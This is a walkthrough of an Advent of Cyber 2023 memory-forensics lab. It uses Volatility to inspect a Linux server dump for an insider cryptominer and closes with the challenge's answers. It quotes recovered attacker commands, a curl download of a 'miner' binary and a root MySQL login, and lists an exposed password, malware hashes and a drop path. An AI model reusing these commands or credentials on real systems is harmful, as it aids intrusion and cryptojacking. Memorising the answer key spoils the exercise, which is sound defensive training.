Day 19 of Advent of Cyber 2023!
Backstory:
In the bustling hub of Santa's Security Operations Centre (SSOC), Log McBlue flags a potential insider threat emanating from a Linux database server during routine network traffic analysis. Taking decisive action, Forensic McBlue promptly initiates a critical phase by creating a memory dump of the Linux server, capturing its current state for forensic examination. In tandem, a Linux profile is established, providing a baseline reference for server configuration. This meticulous approach enables the elves to discern any irregularities or unauthorized alterations by comparing the server's current state with its known secure configuration.
Armed with these forensic artifacts, the SSOC elves intensify their investigation to uncover the origins and intentions behind the suspicious traffic. Their mission is to safeguard Santa's operations by identifying and neutralizing any potential insider threat. The holiday cybersecurity team is poised and ready, ensuring the festive season remains secure and joyous for all.
Learning Objectives
Understand what memory forensics is and how to use it in a digital forensics investigation
Understand what volatile data and memory dumps are
Learn about Volatility and how it can be used to analyse a memory dump
Learn about Volatility profiles
What is Memory Forensics?
Memory forensics, or volatile memory analysis, is a digital forensics branch focused on examining a computer's temporary memory (RAM). Unlike hard disk forensics, which recovers files, memory forensics looks at programs running during a specific time, as this data is lost when the computer is turned off.
Understanding Volatile Data
In computer forensics, volatile data refers to temporary information stored in RAM. It's crucial for investigators because it offers a snapshot of the computer's state during an incident. Turning off a compromised device may erase valuable evidence like running processes and network connections.
What is a Memory Dump?
A memory dump is a snapshot of a computer's memory captured for analysis. It contains data related to running processes at the time of the dump.
Benefits of Memory Forensics
Memory forensics provides real-time insights into a computer's activities without altering the system. It detects threats, captures volatile data (e.g., passwords), and helps understand user actions during incidents. It's faster than capturing a full hard disk image, enabling rapid analysis by incident response teams.
Understanding Processes
Processes are independent units within an operating system, akin to cooking stations in a kitchen. User processes, like web browsers, are initiated by users, while background processes, like automated backups, operate without direct user interaction. Identifying processes during memory analysis reveals the programs active at the time.
Volatility: Unveiling Digital Insights with Memory Analysis
Introduction to Volatility
Volatility, a Python-based command-line tool, empowers digital forensics and incident response teams by dissecting memory dumps for comprehensive memory analysis. Compatible with Linux, Mac OS, and Windows snapshots, Volatility tackles diverse use cases, such as:
Listing active and closed network connections.
Detailing running processes during capture.
Extracting potential command line history values.
Identifying malicious processes for further scrutiny.
Navigating Volatility
ubuntu@volatility:~$ vol.py -h
This command reveals Volatility's capabilities and options. Two versions exist: Volatility 2 (Python 2) and Volatility 3 (Python 3). For this task, Volatility 2 is employed.
Understanding Volatility Profiles
Profiles are vital for interpreting memory dumps accurately. They define the target system's OS architecture, version, and specific memory details. While Windows profiles come pre-loaded, Linux profiles must be manually created. A pre-prepared Linux profile, like "Ubuntu_5.4.0-163-generic_profile.zip," can be integrated using:
ubuntu@volatility:~/Desktop/Evidence$ cp Ubuntu_5.4.0-163-generic_profile.zip ~/.local/lib/python2.7/site-packages/volatility/plugins/overlays/linux/
Verify the setup with:
ubuntu@volatility:~/Desktop/Evidence$ vol.py --info | grep Ubuntu
This ensures the Linux profile is ready for analysis.
Now, equipped with Volatility and a configured Linux profile, investigators can delve into memory dumps, uncovering vital clues to fortify digital security.
Memory Analysis: Unveiling Malicious Intrusions
Introduction to Volatility Commands
In the pursuit of unraveling a potential insider threat on Santa's Linux server, memory analysis proves indispensable. Armed with the memory dump file "linux.mem" and Volatility, investigators delve into the digital aftermath. The command below exemplifies the initial exploration:
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" -h
This command showcases available options and plugins for in-depth analysis.
Examining Command History
The linux_bash
plugin unveils the command history, spotlighting executed commands during the incident. The following command and output provide crucial insights:
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_bash
The analysis uncovers suspicious commands such as mysql -u root -p'redacted'
and curl
http://10.0.2.64/toy_miner
-o miner
. Cross-referencing with the elf analyst's activities reveals potential unauthorized access to the database and the download of a file named "miner."
Investigating Running Processes
The linux_pslist
plugin scrutinizes running processes, allowing a comprehensive understanding of the system's state:
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_pslist
Anomalies surface with the identification of the unexpected process "miner" and the seemingly benign "mysqlserver." The former suggests a possible cryptomining activity, while the latter, with a different PID from the miner's PPID, hints at a non-direct relationship.
Process Extraction for Deeper Insights
To gain deeper insights into suspicious processes, extracting their binaries is imperative. This can be achieved through process extraction, shedding light on the nature and origin of each process:
Note: The command for process extraction is not provided here but would be an essential next step in the analysis.
By progressively unraveling the command history, scrutinizing running processes, and extracting process binaries, investigators piece together a comprehensive narrative of the incident. The collective findings pave the way for informed remediation efforts, safeguarding Santa's digital infrastructure from potential insider threats.
Process Extraction and File Enumeration
Extracting Process Binaries
Understanding a process involves extracting its binary for thorough analysis and evidence preservation. The linux_procdump
plugin facilitates this task. The following commands demonstrate the extraction process for both the suspicious "miner" and "mysqlserver" processes:
ubuntu@volatility:~/Desktop/Evidence$ mkdir extracted
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_procdump -D extracted -p PID
Replace PID
with the actual Process ID obtained from the previous steps. The successful extraction is confirmed by the appearance of output files in the "extracted" directory.
MD5 Hash Calculation
For threat intelligence purposes, McSkidy requests the MD5 hash of each extracted binary. The following commands generate the MD5 hash values:
ubuntu@volatility:~/Desktop/Evidence$ md5sum extracted/miner.PID.0x400000
REDACTED extracted/miner.PID.0x400000
ubuntu@volatility:~/Desktop/Evidence$ md5sum extracted/mysqlserver.10291.0x400000
REDACTED extracted/mysqlserver.10291.0x400000
The generated MD5 hashes are then provided to McSkidy for further analysis.
File Enumeration and Extraction
In the pursuit of identifying potential persistence mechanisms, the presence of cron files is explored. Leveraging the linux_enumerate_files
plugin, the investigator narrows the search using grep
:
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_enumerate_files | grep -i cron
The identified crontab file, located in /var/spool/cron/crontabs/elfie
, raises suspicions. To delve deeper, the investigator extracts the file for examination:
ubuntu@volatility:~/Desktop/Evidence$ vol.py -f linux.mem --profile="LinuxUbuntu_5_4_0-163-generic_profilex64" linux_find_file -i 0xffff9ce9b78280e8 -O extracted/elfie
The extracted file, named "elfie," is then examined to unravel the details of how the "mysqlserver" process was introduced.
With a plethora of evidence in hand, Forensic McBlue conscientiously follows the company's incident response and incident management process, ensuring a systematic and thorough resolution to the security incident.
Q1. What is the exposed password that we find from the bash history output?
A1. NEhX4VSrN7sV
Q2. What is the PID of the miner process that we find?
A2. 10280
Q3. What is the MD5 hash of the miner process?
A3. 153A5c8efe4aa3be240e5dc645480dee
Q4. What is the MD5 hash of the mysqlserver process?
A4. c586e774bb2aa17819d7faae18dad7d1
Q5.Use the command strings extracted/miner.<PID from question 2>.0x400000 | grep http://
. What is the suspicious URL? (Fully defang the URL using CyberChef)
A5. hxxp[://]mcgreedysecret2[.]thm
Q6. After reading the elfie file, what location is the mysqlserver process dropped in on the file system?
A6. /var/tmp/.system-python3.8-Updates/mysqlserver